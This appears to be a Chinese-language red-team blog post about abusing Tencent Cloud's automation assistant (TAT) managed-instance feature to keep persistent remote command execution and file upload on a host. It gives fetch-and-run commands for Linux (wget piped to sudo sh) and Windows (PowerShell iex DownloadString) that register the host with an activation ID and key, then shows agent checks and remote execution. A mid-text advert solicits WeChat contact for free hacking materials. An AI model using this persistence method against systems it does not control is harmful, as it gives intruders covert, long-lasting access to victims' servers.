前言
剛好看到一個師傅分享了一個阿里雲ECS實戰攻防,然後想到了同樣利用騰訊雲CVM的託管亦可實現在實戰攻防中的權限維持。
簡介
騰訊雲自動化助手(TencentCloud Automation Tools,TAT)是一個原生運維部署工具,它可以在不登錄或輸入密碼的情況下,實現對雲服務器 CVM 和輕量應用服務器 Lighthouse 的自動化遠程操作。該工具支持批量執行命令,包括 Shell、PowerShell 及 Python 等,能夠完成一系列自動化運維任務,如運行自動化腳本、輪詢進程、安裝/卸載軟件、更新應用及安裝補丁等。這樣的便利性使得企業可以更加高效地管理和維護其雲服務器和輕量應用服務器,從而提高其雲計算服務的可靠性和安全性。
應用場景
上傳並運行自動化運維腳本
執行常見操作任務
運行已保存的腳本
託管實例
控制檯->自動化助手->託管實例
權限維持
使用默認數值即可,默認值的閾值設定和阿里雲的一致
實例創建成功後,可在客戶端執行命令
Linux命令
sudo wget -qO - https://xxxxxxxxx.cos.accelerate.myqcloud.com/tat_agent/tat_agent_register.sh | sudo sh -s -- ap-guangzhou b3ec8e08-d73a-40d8-83c4-7308101b00b6 be131e221d1749a6860a4e3a6e1b37415f1c867f2646436abb67e0998fa24883
Windows
iex "& { $((New-Object System.Net.WebClient).DownloadString('https://xxxxxxxxx.cos.accelerate.myqcloud.com/tat_agent/tat_agent_register.ps1')) } ap-guangzhou b3ec8e08-d73a-40d8-83c4-7308101b00b6 be131e221d1749a6860a4e3a6e1b37415f1c867f2646436abb67e0998fa24883"
執行命令後發現實例可託管成功,但是是離線狀態
【---- 幫助網安學習,以下所有學習資料免費領!領取資料加 we~@x:dctintin,備註 “開源中國” 獲取!】
① 網安學習成長路徑思維導圖
② 60 + 網安經典常用工具包
③ 100+SRC 漏洞分析報告
④ 150 + 網安攻防實戰技術電子書
⑤ 最權威 CISSP 認證考試指南 + 題庫
⑥ 超 1800 頁 CTF 實戰技巧手冊
⑦ 最新網安大廠面試題合集(含答案)
⑧ APP 客戶端安全檢測指南(安卓 + IOS)
宿主服務器安裝自動化助手客戶端
root@ubuntu:/home/ubuntu# sudo wget -qO - https://xxxxxxxxx.cos-internal.accelerate.tencentcos.cn/tat_agent/tat_agent_installer.sh | sudo sh
查看探針狀態
ps -ef | grep tat_agent
命令後,查看進程狀態。如果進程不存在
/usr/local/qcloud/tat_agent/tat_agent // 啓動進程
其實這裏的客戶端的探針類似於監聽狀態,一直在線,託管服務器執行命令上線
執行命令
執行結果
執行時長48秒
文件上傳
文件上傳權限等均可自定義。
小結
可以明顯發現執行時效性不是很流暢,但是優點兒在於:
託管權限維持穩定
文件上傳方便以及文件權限方便